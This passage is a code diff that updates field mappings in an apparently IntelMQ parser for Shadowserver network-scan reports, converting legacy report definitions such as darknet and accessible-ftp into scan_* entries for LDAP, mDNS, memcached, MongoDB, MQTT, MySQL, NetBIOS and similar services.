+        ('extra.', 'configuration_naming_context', validate_to_none),
+        ('extra.', 'current_time', validate_to_none),
+        ('extra.', 'default_naming_context', validate_to_none),
+        ('extra.', 'ds_service_name', validate_to_none),
+        ('extra.', 'ldap_service_name', validate_to_none),
+        ('extra.', 'naming_contexts', validate_to_none),
+        ('extra.', 'root_domain_naming_context', validate_to_none),
+        ('extra.', 'schema_naming_context', validate_to_none),
         ('extra.', 'server_name', validate_to_none),
-        ('extra.', 'signature', validate_to_none),
-        ('extra.', 'directory_service', validate_to_none),
-        ('extra.', 'utf8_servername', validate_to_none),
-        ('extra.', 'network_address', validate_to_none),
+        ('extra.', 'subschema_subentry', validate_to_none),
+        ('extra.', 'supported_capabilities', validate_to_none),
+        ('extra.', 'supported_control', validate_to_none),
+        ('extra.', 'supported_ldap_policies', validate_to_none),
+        ('extra.', 'supported_ldap_version', validate_to_none),
+        ('extra.', 'supported_sasl_mechanisms', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'open-ldap',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-afp',
-        'protocol.application': 'afp',
+        'protocol.application': 'ldap',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Darknet
-# legacy (replaced by event4_honeypot_darknet)
-darknet = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-ldap-tcp-report/
+scan_ldap_udp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.port', 'port'),
+        ('source.local_hostname', 'dns_host_name', validate_to_none),
+        ('extra.', 'domain_controller_functionality', convert_int),
+        ('extra.', 'domain_functionality', convert_int),
+        ('extra.', 'forest_functionality', convert_int),
+        ('extra.', 'highest_committed_usn', convert_int),
+        ('extra.', 'is_global_catalog_ready', convert_bool),
+        ('extra.', 'is_synchronized', convert_bool),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname'),
-        ('extra.', 'type', validate_to_none),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port', convert_int),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('extra.', 'count', convert_int),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sic', 'dst_sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'family', validate_to_none),
-        ('classification.identifier', 'tag'),  # different values possible in this report
-        ('extra.', 'public_source', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.', 'size', convert_int),
+        ('extra.', 'configuration_naming_context', validate_to_none),
+        ('extra.', 'current_time', validate_to_none),
+        ('extra.', 'default_naming_context', validate_to_none),
+        ('extra.', 'ds_service_name', validate_to_none),
+        ('extra.', 'ldap_service_name', validate_to_none),
+        ('extra.', 'naming_contexts', validate_to_none),
+        ('extra.', 'root_domain_naming_context', validate_to_none),
+        ('extra.', 'schema_naming_context', validate_to_none),
+        ('extra.', 'server_name', validate_to_none),
+        ('extra.', 'subschema_subentry', validate_to_none),
+        ('extra.', 'supported_capabilities', validate_to_none),
+        ('extra.', 'supported_control', validate_to_none),
+        ('extra.', 'supported_ldap_policies', validate_to_none),
+        ('extra.', 'supported_ldap_version', validate_to_none),
+        ('extra.', 'supported_sasl_mechanisms', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'other',
-        'classification.type': 'other',
+        'classification.identifier': 'open-ldap',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'ldap',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Amplification-DDoS-Victim
-# legacy (replaced by honeypot-ddos-amp)
-amplification_ddos_victim = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-mdns-report/
+scan_mdns = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.port', 'src_port'),
         ('protocol.transport', 'protocol'),
-        ('destination.port', 'dst_port'),
         ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'tag', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'request', validate_to_none),
-        ('extra.', 'count', convert_int),
-        ('extra.', 'bytes', convert_int),
-        ('extra.', 'sensor_geo', validate_to_none),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.', 'end_time', convert_date_utc),
-        ('extra.', 'public_source', validate_to_none),
+        ('extra.', 'mdns_name', validate_to_none),
+        ('extra.', 'mdns_ipv4', validate_to_none),
+        ('extra.', 'mdns_ipv6', validate_to_none),
+        ('extra.', 'services', validate_to_none),
+        ('extra.', 'workstation_name', validate_to_none),
+        ('extra.', 'workstation_ipv4', validate_to_none),
+        ('extra.', 'workstation_ipv6', validate_to_none),
+        ('extra.', 'workstation_info', validate_to_none),
+        ('extra.', 'http_name', validate_to_none),
+        ('extra.', 'http_ipv4', validate_to_none),
+        ('extra.', 'http_ipv6', validate_to_none),
+        ('extra.', 'http_ptr', validate_to_none),
+        ('extra.', 'http_info', validate_to_none),
+        ('extra.', 'http_target', validate_to_none),
+        ('extra.', 'http_port', convert_int),
+        ('extra.', 'spotify_name', validate_to_none),
+        ('extra.', 'spotify_ipv4', validate_to_none),
+        ('extra.', 'spotify_ipv6', validate_to_none),
+        ('extra.', 'opc_ua_discovery', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'availability',
-        'classification.type': 'ddos',
-        'classification.identifier': 'amplification-ddos-victim',
-    }
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'mdns',
+        'classification.identifier': 'open-mdns',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/HTTP-Scanners
-http_scanners = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-memcached-report/
+scan_memcached = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'pid', convert_int),
+        ('extra.', 'pointer_size', convert_int),
+        ('extra.', 'uptime', convert_int),
+        ('extra.', 'curr_connections', convert_int),
+        ('extra.', 'total_connections', convert_int),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname'),
-        ('destination.ip', 'dst_ip'),
-        ('destination.port', 'dst_port'),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.fqdn', 'dst_dns', validate_fqdn),
-        ('extra.', 'type', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'time', validate_to_none),
         ('extra.', 'sector', validate_to_none),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('extra.', 'sensorid', validate_to_none),
-        ('extra.', 'pattern', validate_to_none),
-        ('extra.', 'url', validate_to_none),
-        ('extra.file.md5', 'file_md5', validate_to_none),
-        ('extra.file.sha256', 'file_sha256', validate_to_none),
-        ('extra.', 'request_raw', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'information-gathering',
-        'classification.type': 'scanner',
-        'classification.identifier': 'http',
-        'protocol.application': 'http',
-        'protocol.transport': 'tcp',
-    }
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'memcached',
+        'classification.identifier': 'open-memcached',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/ICS-Scanners
-ics_scanners = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-mongodb-report/
+scan_mongodb = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.asn', 'asn', invalidate_zero),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname'),
-        ('protocol.application', 'protocol'),
-        ('destination.ip', 'dst_ip'),
-        ('destination.port', 'dst_port'),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.fqdn', 'dst_dns', validate_fqdn),
-        ('extra.', 'type', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'gitversion', validate_to_none),
+        ('extra.', 'sysinfo', validate_to_none),
+        ('extra.', 'opensslversion', validate_to_none),
+        ('extra.', 'allocator', validate_to_none),
+        ('extra.', 'javascriptengine', validate_to_none),
+        ('extra.', 'bits', validate_to_none),
+        ('extra.', 'maxbsonobjectsize', validate_to_none),
+        ('extra.', 'ok', validate_to_none),
+        ('extra.', 'visible_databases', validate_to_none),
         ('extra.', 'sector', validate_to_none),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('extra.', 'sensorid', validate_to_none),
-        ('extra.', 'state', validate_to_none),
-        ('extra.', 'slave_id', validate_to_none),
-        ('extra.', 'function_code', convert_int),
-        ('extra.', 'request', validate_to_none),
-        ('extra.', 'response', convert_int),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'information-gathering',
-        'classification.type': 'scanner',
-        'classification.identifier': 'ics',
-    }
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'mongodb',
+        'classification.identifier': 'open-mongodb',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-Ubiquiti
-accessible_ubiquiti_discovery_service = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-mqtt-report/
+scan_mqtt = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'anonymous_access', convert_bool),
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'accessible-ubiquiti-discovery-service' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.mac_address', 'mac', validate_to_none),
-        ('extra.radio_name', 'radioname', validate_to_none),
-        ('extra.', 'essid', validate_to_none),
-        ('extra.model', 'modelshort', validate_to_none),
-        ('extra.model_full', 'modelfull', validate_to_none),
-        ('extra.firmwarerev', 'firmware', validate_to_none),
-        ('extra.response_size', 'size', convert_int),
+        ('extra.', 'raw_response', validate_to_none),
+        ('extra.', 'hex_code', validate_to_none),
+        ('extra.', 'code', validate_to_none),
+        ('extra.', 'cipher_suite', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'subject_organization_name', validate_to_none),
+        ('extra.', 'subject_organization_unit_name', validate_to_none),
+        ('extra.', 'subject_country', validate_to_none),
+        ('extra.', 'subject_state_or_province_name', validate_to_none),
+        ('extra.', 'subject_locality_name', validate_to_none),
+        ('extra.', 'subject_street_address', validate_to_none),
+        ('extra.', 'subject_postal_code', validate_to_none),
+        ('extra.', 'subject_surname', validate_to_none),
+        ('extra.', 'subject_given_name', validate_to_none),
+        ('extra.', 'subject_email_address', validate_to_none),
+        ('extra.', 'subject_business_category', validate_to_none),
+        ('extra.', 'subject_serial_number', validate_to_none),
+        ('extra.', 'issuer_organization_name', validate_to_none),
+        ('extra.', 'issuer_organization_unit_name', validate_to_none),
+        ('extra.', 'issuer_country', validate_to_none),
+        ('extra.', 'issuer_state_or_province_name', validate_to_none),
+        ('extra.', 'issuer_locality_name', validate_to_none),
+        ('extra.', 'issuer_street_address', validate_to_none),
+        ('extra.', 'issuer_postal_code', validate_to_none),
+        ('extra.', 'issuer_surname', validate_to_none),
+        ('extra.', 'issuer_given_name', validate_to_none),
+        ('extra.', 'issuer_email_address', validate_to_none),
+        ('extra.', 'issuer_business_category', validate_to_none),
+        ('extra.', 'issuer_serialNumber', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-ubiquiti-discovery-service',
-    }
+        'protocol.application': 'mqtt',
+        'classification.identifier': 'open-mqtt',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-FTP
-accessible_ftp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-mqtt-report/
+scan_mqtt_anon = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'accessible-ftp' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'banner', validate_to_none),
-        ('extra.', 'handshake', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.', 'raw_response', validate_to_none),
+        ('extra.', 'hex_code', validate_to_none),
+        ('extra.', 'code', validate_to_none),
         ('extra.', 'cipher_suite', validate_to_none),
         ('extra.', 'cert_length', convert_int),
         ('extra.', 'subject_common_name', validate_to_none),
@@ -2167,8 +2422,11 @@ def force_base64(value: Optional[str]) -> Optional[str]:
         ('extra.', 'cert_issue_date', validate_to_none),
         ('extra.', 'cert_expiration_date', validate_to_none),
         ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
         ('extra.', 'cert_serial_number', validate_to_none),
-        ('extra.', 'ssl_version', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
         ('extra.', 'signature_algorithm', validate_to_none),
         ('extra.', 'key_algorithm', validate_to_none),
         ('extra.', 'subject_organization_name', validate_to_none),
@@ -2194,872 +2452,1591 @@ def force_base64(value: Optional[str]) -> Optional[str]:
         ('extra.', 'issuer_given_name', validate_to_none),
         ('extra.', 'issuer_email_address', validate_to_none),
         ('extra.', 'issuer_business_category', validate_to_none),
-        ('extra.', 'issuer_serial_number', validate_to_none),
-        ('extra.', 'sha256_fingerprint', validate_to_none),
-        ('extra.', 'sha512_fingerprint', validate_to_none),
-        ('extra.', 'md5_fingerprint', validate_to_none),
-        ('extra.', 'cert_valid', convert_bool),
-        ('extra.', 'self_signed', convert_bool),
-        ('extra.', 'cert_expired', convert_bool),
-        ('extra.', 'validation_level', validate_to_none),
-        ('extra.', 'auth_tls_response', validate_to_none),
-        ('extra.', 'auth_ssl_response', validate_to_none)
+        ('extra.', 'issuer_serialNumber', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-ftp',
-        'protocol.application': 'ftp',
-    }
+        'protocol.application': 'mqtt',
+        'classification.identifier': 'open-mqtt-anon',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/open-mqtt-report/
-open_mqtt = {
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-MSSQL
+scan_mssql = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('source.local_hostname', 'server_name', validate_to_none),
+        ('extra.', 'tcp_port', convert_int),
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-mqtt' in constant_fields
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'anonymous_access', convert_bool),
-        ('extra.', 'raw_response', validate_to_none),
-        ('extra.', 'hex_code', validate_to_none),
-        ('extra.', 'code', validate_to_none)
+        ('extra.', 'instance_name', validate_to_none),
+        ('extra.', 'named_pipe', validate_to_none),
+        ('extra.', 'response_length', convert_int),
+        ('extra.', 'amplification', convert_float),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-mqtt',
-        'protocol.application': 'mqtt',
-    }
+        'protocol.application': 'mssql',
+        'classification.identifier': 'open-mssql',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/open-ipp-report/
-open_ipp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-mysql-server-report/
+scan_mysql = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'client_can_handle_expired_passwords', convert_bool),
+        ('extra.', 'client_compress', convert_bool),
+        ('extra.', 'client_connect_attrs', convert_bool),
+        ('extra.', 'client_connect_with_db', convert_bool),
+        ('extra.', 'client_deprecated_eof', convert_bool),
+        ('extra.', 'client_found_rows', convert_bool),
+        ('extra.', 'client_ignore_sigpipe', convert_bool),
+        ('extra.', 'client_ignore_space', convert_bool),
+        ('extra.', 'client_interactive', convert_bool),
+        ('extra.', 'client_local_files', convert_bool),
+        ('extra.', 'client_long_flag', convert_bool),
+        ('extra.', 'client_long_password', convert_bool),
+        ('extra.', 'client_multi_results', convert_bool),
+        ('extra.', 'client_multi_statements', convert_bool),
+        ('extra.', 'client_no_schema', convert_bool),
+        ('extra.', 'client_odbc', convert_bool),
+        ('extra.', 'client_plugin_auth', convert_bool),
+        ('extra.', 'client_plugin_auth_len_enc_client_data', convert_bool),
+        ('extra.', 'client_protocol_41', convert_bool),
+        ('extra.', 'client_ps_multi_results', convert_bool),
+        ('extra.', 'client_reserved', convert_bool),
+        ('extra.', 'client_secure_connection', convert_bool),
+        ('extra.', 'client_session_track', convert_bool),
+        ('extra.', 'client_ssl', convert_bool),
+        ('extra.', 'client_transactions', convert_bool),
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-ipp' in constant_fields
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'ipp_version', validate_to_none),
-        ('extra.', 'cups_version', validate_to_none),
-        ('extra.', 'printer_uris', validate_to_none),
-        ('extra.', 'printer_name', validate_to_none),
-        ('extra.', 'printer_info', validate_to_none),
-        ('extra.', 'printer_more_info', validate_to_none),
-        ('extra.', 'printer_make_and_model', validate_to_none),
-        ('extra.', 'printer_firmware_name', validate_to_none),
-        ('extra.', 'printer_firmware_string_version', validate_to_none),
-        ('extra.', 'printer_firmware_version', validate_to_none),
-        ('extra.', 'printer_organization', validate_to_none),
-        ('extra.', 'printer_organization_unit', validate_to_none),
-        ('extra.', 'printer_uuid', validate_to_none),
-        ('extra.', 'printer_wifi_ssid', validate_to_none)
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'mysql_protocol_version', validate_to_none),
+        ('extra.', 'server_version', validate_to_none),
+        ('extra.', 'error_code', validate_to_none),
+        ('extra.', 'error_id', validate_to_none),
+        ('extra.', 'error_message', validate_to_none),
+        ('extra.', 'handshake', validate_to_none),
+        ('extra.', 'cipher_suite', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'subject_organization_name', validate_to_none),
+        ('extra.', 'subject_organization_unit_name', validate_to_none),
+        ('extra.', 'subject_country', validate_to_none),
+        ('extra.', 'subject_state_or_province_name', validate_to_none),
+        ('extra.', 'subject_locality_name', validate_to_none),
+        ('extra.', 'subject_street_address', validate_to_none),
+        ('extra.', 'subject_postal_code', validate_to_none),
+        ('extra.', 'subject_surname', validate_to_none),
+        ('extra.', 'subject_given_name', validate_to_none),
+        ('extra.', 'subject_email_address', validate_to_none),
+        ('extra.', 'subject_business_category', validate_to_none),
+        ('extra.', 'subject_serial_number', validate_to_none),
+        ('extra.', 'issuer_organization_name', validate_to_none),
+        ('extra.', 'issuer_organization_unit_name', validate_to_none),
+        ('extra.', 'issuer_country', validate_to_none),
+        ('extra.', 'issuer_state_or_province_name', validate_to_none),
+        ('extra.', 'issuer_locality_name', validate_to_none),
+        ('extra.', 'issuer_street_address', validate_to_none),
+        ('extra.', 'issuer_postal_code', validate_to_none),
+        ('extra.', 'issuer_surname', validate_to_none),
+        ('extra.', 'issuer_given_name', validate_to_none),
+        ('extra.', 'issuer_email_address', validate_to_none),
+        ('extra.', 'issuer_business_category', validate_to_none),
+        ('extra.', 'issuer_serial_number', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'cert_valid', convert_bool),
+        ('extra.', 'self_signed', convert_bool),
+        ('extra.', 'cert_expired', convert_bool),
+        ('extra.', 'validation_level', validate_to_none),
+        ('extra.', 'browser_trusted', validate_to_none),
+        ('extra.', 'browser_error', validate_to_none),
+        ('extra.', 'raw_cert', validate_to_none),
+        ('extra.', 'raw_cert_chain', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-ipp',
-        'protocol.application': 'ipp',
-    }
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'protocol.application': 'mysql',
+        'classification.identifier': 'open-mysql',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/accessible-coap-report/
-accessible_coap = {
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-NATPMP
+scan_nat_pmp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'accessible-coap' in constant_fields
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'response', validate_to_none)
+        ('extra.', 'opcode', validate_to_none),
+        ('extra.', 'uptime', validate_to_none),
+        ('extra.', 'external_ip', validate_to_none),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'open-natpmp',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-coap',
-        'protocol.application': 'coap',
-    }
+        'protocol.application': 'natpmp',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/accessible-apple-remote-desktop-ard-report/
-accessible_ard = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-netbios-report/
+scan_netbios = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('source.account', 'username'),
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'mac_address', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
-        # ('classification.identifier', 'tag'),  # always 'ard' - set in constant fields
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('protocol.transport', 'protocol'),
+        ('extra.', 'workgroup', validate_to_none),
+        ('extra.', 'machine_name', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'machine_name', validate_to_none),
-        ('extra.', 'response_size', convert_int),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'open-netbios-nameservice',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-ard',
-    }
+        'protocol.application': 'netbios-nameservice',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/accessible-radmin-report/
-accessible_radmin = {
+# https://www.shadowserver.org/what-we-do/network-reporting/netcore-netis-router-vulnerability-scan-report/
+scan_netis_router = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
+        ('source.ip', 'ip', validate_ip),
         ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.asn', 'asn', convert_int),
-        # ('classification.identifier', 'tag'),  # always 'accessible-radmin' - set in constant_fields
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'response', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname', validate_to_none),
-        ('protocol.transport', 'protocol'),
-        ('extra.', 'naics', convert_int),
-        ('extra.', 'version', validate_to_none),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
-        'classification.identifier': 'accessible-radmin',
+        'classification.identifier': 'open-netis',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-    }
+        'protocol.transport': 'udp',
+    },
 }
 
